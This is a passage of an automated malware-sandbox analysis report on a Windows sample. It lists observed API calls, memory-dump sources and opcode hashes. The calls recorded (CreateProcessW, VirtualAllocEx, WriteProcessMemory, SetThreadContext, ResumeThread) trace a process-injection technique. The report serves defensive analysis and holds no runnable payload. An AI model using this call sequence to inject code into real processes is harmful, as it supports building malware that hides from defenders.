                                          				if(_v8 != _t7) {
                                          					goto L2;
                                          				}
                                          				return _t7;
                                          			}





                                          0x0040f0c0
                                          0x0040f0db
                                          0x00000000
                                          0x0040f0db
                                          0x0040f0c2
                                          0x0040f0cd
                                          0x0040f0d5
                                          0x0040f0d9
                                          0x00000000
                                          0x00000000
                                          0x0040f0de

                                          APIs
                                          • GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                                          • IsWow64Process.KERNEL32(00000000,?,?,004075EA), ref: 0040F0CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentWow64
                                          • String ID: u@
                                          • API String ID: 1905925150-3232061631
                                          • Opcode ID: 05b8a05900606b398f09c2950b134f384ae98fa98ef01e98a6f019ff040a7163
                                          • Instruction ID: b4949ba5ee1ac7fd9ca4b4149c3ba77f2c621f6c2d7f9141efebdf600ba6dbaf
                                          • Opcode Fuzzy Hash: 05b8a05900606b398f09c2950b134f384ae98fa98ef01e98a6f019ff040a7163
                                          • Instruction Fuzzy Hash: 9BD05EB1400204EBDF1097A0A90DBCB37ACA748741F004871A105E60D2D6B8A688D728
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: YbXD$\/Q
                                          • API String ID: 0-3717613235
                                          • Opcode ID: 9348b78f1c2e840bbc8a40585f7cf2be86256909a9aac34c249016f860e58bca
                                          • Instruction ID: f2e3d9d870f0c07041e17f2dd64da53ae14b07d17eddcf163c3e61aa866a859e
                                          • Opcode Fuzzy Hash: 9348b78f1c2e840bbc8a40585f7cf2be86256909a9aac34c249016f860e58bca
                                          • Instruction Fuzzy Hash: F8B169B4E152198FCB08CFE9C9816DEFBF6BF99300F14C56AD404AB298D7349942CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8c8afe4d2116cae180c156ec7e7c7eac229351a76586a67d75b0e3d79b84818
                                          • Instruction ID: 7bd8e0e9d4d2626b4c44d74622b087e43df3931fecc7c1fbd00e0e627ef57214
                                          • Opcode Fuzzy Hash: c8c8afe4d2116cae180c156ec7e7c7eac229351a76586a67d75b0e3d79b84818
                                          • Instruction Fuzzy Hash: 31434FB4A00219CFDB24DF68C894A9DB7B2BF59304F2581D9D419AB3A1DB30ED91CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: da22c93c4bcb1f3015540b6fc0310c4b2fefe233119c2287de50f2ab555ce338
                                          • Instruction ID: de045f634767ab4b66f960c6a9c7210e00772243dc85f6ff65a14e532d41404a
                                          • Opcode Fuzzy Hash: da22c93c4bcb1f3015540b6fc0310c4b2fefe233119c2287de50f2ab555ce338
                                          • Instruction Fuzzy Hash: 08C1A0B1E042599FDB05DFA5D850AEEBBB2FF89300F15C16AE404EB392DB349845CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6138c97366737f38d9859b7cc11850901986c7ba92af8a544d462e5c20f177b1
                                          • Instruction ID: d6bd4df60a82e0363e290dcc565dd02889b453fc45bd47fa1b936eb6c9cddf6b
                                          • Opcode Fuzzy Hash: 6138c97366737f38d9859b7cc11850901986c7ba92af8a544d462e5c20f177b1
                                          • Instruction Fuzzy Hash: DB428FB5B00215CFCB19DFA8C495AAD7BB2BF99714F168069E906DB3A0DB30EC41CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed2e0a3dffff30a6d4629227873f46b9a321a0b75baf7ee071e2048774553179
                                          • Instruction ID: 57a83def5b1c170486af73326ed0580f77e6610823b78b564899ac977b3e0e13
                                          • Opcode Fuzzy Hash: ed2e0a3dffff30a6d4629227873f46b9a321a0b75baf7ee071e2048774553179
                                          • Instruction Fuzzy Hash: E09103B4E116198FCB08CFE9C880AEEFBB2BF89300F14942AD415AB3A4D7749945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bc8d100da968c2523587291fb6b5024aad88d9f13b0bfe841b5db4ede8dff67
                                          • Instruction ID: f9dff50f00844522e511841449bf480d0cda0a885f3a0c2ca4b5a44403f9caea
                                          • Opcode Fuzzy Hash: 9bc8d100da968c2523587291fb6b5024aad88d9f13b0bfe841b5db4ede8dff67
                                          • Instruction Fuzzy Hash: 999117B4E116098FCB08CFE9C990ADEFBB2BF89300F14942AD415AB3A4D7749945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56b8632e7846d21f8ce022767ea1ab79159fd3be53e40ba67ad3a1306711e825
                                          • Instruction ID: e5cfc42c904421f84fe5fbe2cac7e9d93fcaf91210af9a4dd703076d4a38844e
                                          • Opcode Fuzzy Hash: 56b8632e7846d21f8ce022767ea1ab79159fd3be53e40ba67ad3a1306711e825
                                          • Instruction Fuzzy Hash: EF81E1B4E112198FDB08CFE9C984AEEFBB2BF89300F10802AD519AB394D7749945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cbbb525ea003e1a039af6cb8373c939dcf3201b434e38efe84107d413195726
                                          • Instruction ID: 60a3a350f17d28974525bcf3745f82887141e3c3c3b3940641108a8dfa90165d
                                          • Opcode Fuzzy Hash: 0cbbb525ea003e1a039af6cb8373c939dcf3201b434e38efe84107d413195726
                                          • Instruction Fuzzy Hash: C981E2B4E11619CFCB08CFE9C9846AEBBB2BF89300F20D42AD415AB394D7749945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff16812e3050aa8faefe6579f85176fd3df633a1bf17ac6d8df68eaa281ea251
                                          • Instruction ID: 923da0642d78fb27dbef55bec1915b82c9845339e7aa6fd7569b45b2069e54a7
                                          • Opcode Fuzzy Hash: ff16812e3050aa8faefe6579f85176fd3df633a1bf17ac6d8df68eaa281ea251
                                          • Instruction Fuzzy Hash: 67512CB4E1520A8FCB08CFE6C9405EEFBF2EB89310F14C46AD419A7294D7748A418F98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4335e29f4d8446431a5476e3a005125dd233ac8757472831562b733b424829e
                                          • Instruction ID: b446e609e1d08575dfd55a19b6e59c5701dbffd70be9bc5490a9059dc624706f
                                          • Opcode Fuzzy Hash: d4335e29f4d8446431a5476e3a005125dd233ac8757472831562b733b424829e
                                          • Instruction Fuzzy Hash: 854129B1E002189FDB04DFEAC8806EEBBF6EF89300F14C56AD414AB355DB309946CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 342c8b6dc3157827bacfb1aa20f78654bf148190c5bf7767547f1e5619f8b196
                                          • Instruction ID: 67c67d4bee61755b75cb0f666a3759919f11778d7aaf0f447c8ae83b4a83c202
                                          • Opcode Fuzzy Hash: 342c8b6dc3157827bacfb1aa20f78654bf148190c5bf7767547f1e5619f8b196
                                          • Instruction Fuzzy Hash: 5F2119B1E016589BEB18CFABD9412DEBBB3AFC9310F14C16AD409B6268DB345A45CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 014DB8D0
                                          • GetCurrentThread.KERNEL32 ref: 014DB90D
                                          • GetCurrentProcess.KERNEL32 ref: 014DB94A
                                          • GetCurrentThreadId.KERNEL32 ref: 014DB9A3
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 864b8ced7bcc6c1dfa27e19cd202f0868e42dda22a92285553530fedd9b34069
                                          • Instruction ID: 00f91558756818b9be6e6c1553d154bf42aec13d439f01bbb079bb0ca29575dd
                                          • Opcode Fuzzy Hash: 864b8ced7bcc6c1dfa27e19cd202f0868e42dda22a92285553530fedd9b34069
                                          • Instruction Fuzzy Hash: 285150B0D002498FDB14CFAAD988BEEBBF1EF4A314F24849AE009A7360C7355844CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 014DB8D0
                                          • GetCurrentThread.KERNEL32 ref: 014DB90D
                                          • GetCurrentProcess.KERNEL32 ref: 014DB94A
                                          • GetCurrentThreadId.KERNEL32 ref: 014DB9A3
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: a2293747a9f7816e73e6d297b5c752c2772fe84c25e407ab7d0001add5de99c7
                                          • Instruction ID: 3f23b9edf6838ddb014e84c8dc01f8cfaa4b78ac55485e955d246dc4f0f1b722
                                          • Opcode Fuzzy Hash: a2293747a9f7816e73e6d297b5c752c2772fe84c25e407ab7d0001add5de99c7
                                          • Instruction Fuzzy Hash: D25140B0D002499FDB14CFAAD948B9EBBF1FB49354F24849AE109A3360C7759944CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D97CE
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 214fb9d0fa7247a5beaf8cfccf90b7055d5110ad1f1c446a2b23bf59d695bc90
                                          • Instruction ID: 504a0e1ce07d7046b94bab115ebd2590ee18ca753f9ef81c1e70f392db7d984c
                                          • Opcode Fuzzy Hash: 214fb9d0fa7247a5beaf8cfccf90b7055d5110ad1f1c446a2b23bf59d695bc90
                                          • Instruction Fuzzy Hash: 4271F370A00B059FDB24DF2AD4617AABBF1BB88208F00892ED54AD7B50DB75E805CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04FD35F3
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 7dfd24738278e5ae39952b2375a3f02e251ab09ec481dda49c0905d2457ad87e
                                          • Instruction ID: 76ae51c32496837955a98bc4f4eca3792d013240c49aa101ff37171d0c970e7d
                                          • Opcode Fuzzy Hash: 7dfd24738278e5ae39952b2375a3f02e251ab09ec481dda49c0905d2457ad87e
                                          • Instruction Fuzzy Hash: DA511871D00319DFDB20DF99C880BDDBBB6AF48314F158199E948A7250DB71AA85CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04FD35F3
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 1396ee715294aa01e9762ce5b0f94dcfb8f93d971ae80bdc517214abcabc66a9
                                          • Instruction ID: 6bb6d79703d30388ace5070fa7d57c2952f49dbe722da7c3d91acc9e53945923
                                          • Opcode Fuzzy Hash: 1396ee715294aa01e9762ce5b0f94dcfb8f93d971ae80bdc517214abcabc66a9
                                          • Instruction Fuzzy Hash: EF51E571D00319DFDB20DF99C880BDDBBB6BF48314F15819AE908A7250DB75AA89CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 014D5661
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 618df491327782b7a34caf7d0d1f7515de9abc463950a252f2afee64fc31740d
                                          • Instruction ID: b4cfb73609d54fe16ab9806601bfef71e8b9771092128c30f79341fae9134839
                                          • Opcode Fuzzy Hash: 618df491327782b7a34caf7d0d1f7515de9abc463950a252f2afee64fc31740d
                                          • Instruction Fuzzy Hash: DB41FF71C00618CFEF24CFA9D884BDEBBB1BF89318F20806AD508AB250DB755946CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 014D5661
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 51c220f2870b78941a98d29902e6ee142647fbce3e1f0a06248d4ee34fd0e1fd
                                          • Instruction ID: ee737c786add815651cfaed439e42ccd7f1831eae843ed1c2187389ff653caf5
                                          • Opcode Fuzzy Hash: 51c220f2870b78941a98d29902e6ee142647fbce3e1f0a06248d4ee34fd0e1fd
                                          • Instruction Fuzzy Hash: 4A410170C00618CFDF24DFAAC984B9EBBB5FF49304F20806AD519AB251DB756946CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014D9849,00000800,00000000,00000000), ref: 014D9A5A
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 8854b92403390e221d6439d1be0f6073b53c8fa5a1efc6d1e8042440bdc5bfb4
                                          • Instruction ID: bcd2df06b15c1ea072346d1bfaff7c6d1aedb097804fe04c49ca48a598d7b39e
                                          • Opcode Fuzzy Hash: 8854b92403390e221d6439d1be0f6073b53c8fa5a1efc6d1e8042440bdc5bfb4
                                          • Instruction Fuzzy Hash: FF2177B28042498FCF10CFA9C494AEEFBB4EF49254F0484AAE595A7311C334A546CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04FD3BED
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 4993a120d48d4dbc5f9d980d265d9d2fd1d8156a221d112c2106db7d0058d4a5
                                          • Instruction ID: 21ab5cabe07c14e53478c669a4bca5d44c795c3680c71c3dde747bbd22ab9bfd
                                          • Opcode Fuzzy Hash: 4993a120d48d4dbc5f9d980d265d9d2fd1d8156a221d112c2106db7d0058d4a5
                                          • Instruction Fuzzy Hash: F22136B59002099FCB10CFA9D985BDEBBF5FF48320F04852AE918A3240D374A644CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04FD3BED
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 95c75154c8d71d3e326dbfdffaa539bff72f679bf9b12c669962ab761c7338fd
                                          • Instruction ID: 5989697a0bff630f8d31286ec34fe42b2ce313b5a25e5534aadfdf0174a578fa
                                          • Opcode Fuzzy Hash: 95c75154c8d71d3e326dbfdffaa539bff72f679bf9b12c669962ab761c7338fd
                                          • Instruction Fuzzy Hash: F421F5B59002499FCB10CFAAD885BDEBBF5FF48310F14842AE919A3340D778A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DBF27
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: f1178dfe54e57f8c9948098ed41a6f7359beb5359b6d5f128474fc47d36b4284
                                          • Instruction ID: 5a55f5feaa96a9101e563e3b5bface260d2fdc2e97a4a856e2282ffd3d271e77
                                          • Opcode Fuzzy Hash: f1178dfe54e57f8c9948098ed41a6f7359beb5359b6d5f128474fc47d36b4284
                                          • Instruction Fuzzy Hash: BA2105B5D00208AFDF10CFAAD884AEEBBF4EB48320F15805AE954A3310C3799944CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DBF27
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 5a6448caeb49821ede7263549b64defe5bf417c55368b96b36301c9898ba7b36
                                          • Instruction ID: 227dab207fad80791b9ca4cd79541b61bd032b5a169fc4bfc6550bc4c1a8c56f
                                          • Opcode Fuzzy Hash: 5a6448caeb49821ede7263549b64defe5bf417c55368b96b36301c9898ba7b36
                                          • Instruction Fuzzy Hash: 0621C4B5900209AFDF10CFAAD884ADEFBF8EB48324F15845AE955A3310D375A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04FD3887
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: 37b3fb9167c3f4a41458eaefd467d8e6f65953f4c0cf4fb736fff3c6c341bf68
                                          • Instruction ID: c8edbad7ca776689c962244be329c34cde8124710c94d067486b39456c073920
                                          • Opcode Fuzzy Hash: 37b3fb9167c3f4a41458eaefd467d8e6f65953f4c0cf4fb736fff3c6c341bf68
                                          • Instruction Fuzzy Hash: 882149B1D002199BCB10CF9AD945BDEFBB4BB48210F14812AD418B3240D774A948CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04FD394F
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 58bc563f6b19149ba05a458fb0c254d2748ddf937da35ce124286209817e480b
                                          • Instruction ID: 7b1f3774afd4308d0995d239d42c5ad9f181006094ab6a179c643a65c40613ac
                                          • Opcode Fuzzy Hash: 58bc563f6b19149ba05a458fb0c254d2748ddf937da35ce124286209817e480b
                                          • Instruction Fuzzy Hash: 7221E2B59002599FCB10CF9AD884BDEFBF5FB48320F14842AE958A3250D378A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04FD394F
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: b3b3f90e50fbf5e1c74fd1456d8bc3c7eda2064234b1d324ba4cf2cb04f0772d
                                          • Instruction ID: 97aae82f382fd0b2e9e2ff427a45ea2f87ec40747e4ffafdeb90e17e0c7e3c25
                                          • Opcode Fuzzy Hash: b3b3f90e50fbf5e1c74fd1456d8bc3c7eda2064234b1d324ba4cf2cb04f0772d
                                          • Instruction Fuzzy Hash: 272102B5900209DFCB10CFAAD884BDEBBF5FB48320F14842AE958A3610D378A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04FD3887
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: 35e31b23c0c4cdaf81acb3a1def787bffe459ce33a52338463fa07dac049299f
                                          • Instruction ID: 5ef1999c02fac5415e7e12c3ef72dcbf7ff064b13c19b80f544e404d2b6d4757
                                          • Opcode Fuzzy Hash: 35e31b23c0c4cdaf81acb3a1def787bffe459ce33a52338463fa07dac049299f
                                          • Instruction Fuzzy Hash: 162108B1D006199FCB10CF9AD845BDEFBF4BB48224F15816AD518A3240D778A945CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014D9849,00000800,00000000,00000000), ref: 014D9A5A
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 363beec521e224014555e2d20c00b9ebe20633b14241aa6859013388e94eb4be
                                          • Instruction ID: dedd9b20e35798f38617553ec9c4b5ee0bf1c4e81a29461c3aef1d26392746b7
                                          • Opcode Fuzzy Hash: 363beec521e224014555e2d20c00b9ebe20633b14241aa6859013388e94eb4be
                                          • Instruction Fuzzy Hash: BF1144B29002099FDF10CF9AC844BDEFBF4EB48324F00842AE519A7310C374A545CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014D9849,00000800,00000000,00000000), ref: 014D9A5A
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: feebc15321f5b834c94db3d3da656514c86ec5b6bcbecbf31fcd092f3381a522
                                          • Instruction ID: a2cac6b6590862366129a5ec38edf890a429f0afc95437ff7c0f258b268b3ef2
                                          • Opcode Fuzzy Hash: feebc15321f5b834c94db3d3da656514c86ec5b6bcbecbf31fcd092f3381a522
                                          • Instruction Fuzzy Hash: D61103B69002499FDF10CFAAD444BDEFBF5AB88324F15842AE455A7310C378A545CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04FD3A0B
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 809e346b972377acc14cb4af4592f9a41592ee204be8792cf9ef797b298ac51f
                                          • Instruction ID: df19221003681310f99bb9e47482155c71eadd971eac9c1bce15909f679724ad
                                          • Opcode Fuzzy Hash: 809e346b972377acc14cb4af4592f9a41592ee204be8792cf9ef797b298ac51f
                                          • Instruction Fuzzy Hash: 7D1116BA9002499FCB20CF99D985BDEBFF5EB48324F148419E529A7210C775A644CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04FD3A0B
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: f832c421a33ad388c3f113d0eaaa55e855c4588975a7cc936f5227526f308279
                                          • Instruction ID: 0fb0ffea6e88615b75480b9a46832237a4112a527a2d55460e1f162c1503630f
                                          • Opcode Fuzzy Hash: f832c421a33ad388c3f113d0eaaa55e855c4588975a7cc936f5227526f308279
                                          • Instruction Fuzzy Hash: 4E11F5B59002499FCB20DF9AD884BDEBFF4FB48324F148419E529A7210C775A544CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D97CE
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 5fb1062189a59c08b1a6d1a35b45dcb911d6fb6669c839052a4e5b5720a7bd63
                                          • Instruction ID: 7adb8eeed23e0bafce62aa6d3d899439d9540608610513e815718b1b38e45936
                                          • Opcode Fuzzy Hash: 5fb1062189a59c08b1a6d1a35b45dcb911d6fb6669c839052a4e5b5720a7bd63
                                          • Instruction Fuzzy Hash: B61110B6C00209CFDB20CF9AD844BDEFBF4AF88228F15842AD419A7710C378A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: f10f6eedaa43abe484d585374bc30fff10fafdb426ecf4e090c5da0e132e5bc5
                                          • Instruction ID: ed61f4604a8053b76b649a1dffc50babba2e9dca9070b53d015d8d0db10a66b4
                                          • Opcode Fuzzy Hash: f10f6eedaa43abe484d585374bc30fff10fafdb426ecf4e090c5da0e132e5bc5
                                          • Instruction Fuzzy Hash: C21115B5C006498FCB20CF9AD885BDEBFF4EB48324F24845AD519A3750C775A984CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 04FD4675
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: bba9ca775686f9e1a840be913812e3c16cfd200c79c52f6374ff9f2c963a4ffc
                                          • Instruction ID: 5f5288097159922c9fa7cb4b4a4ed42aad5fc001308a3838a10067b49050eafe
                                          • Opcode Fuzzy Hash: bba9ca775686f9e1a840be913812e3c16cfd200c79c52f6374ff9f2c963a4ffc
                                          • Instruction Fuzzy Hash: FA1133B98002499FCB20CF99D884BDEFFF8EB48320F14841AE455A3740C375A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 04FD4675
                                          Memory Dump Source
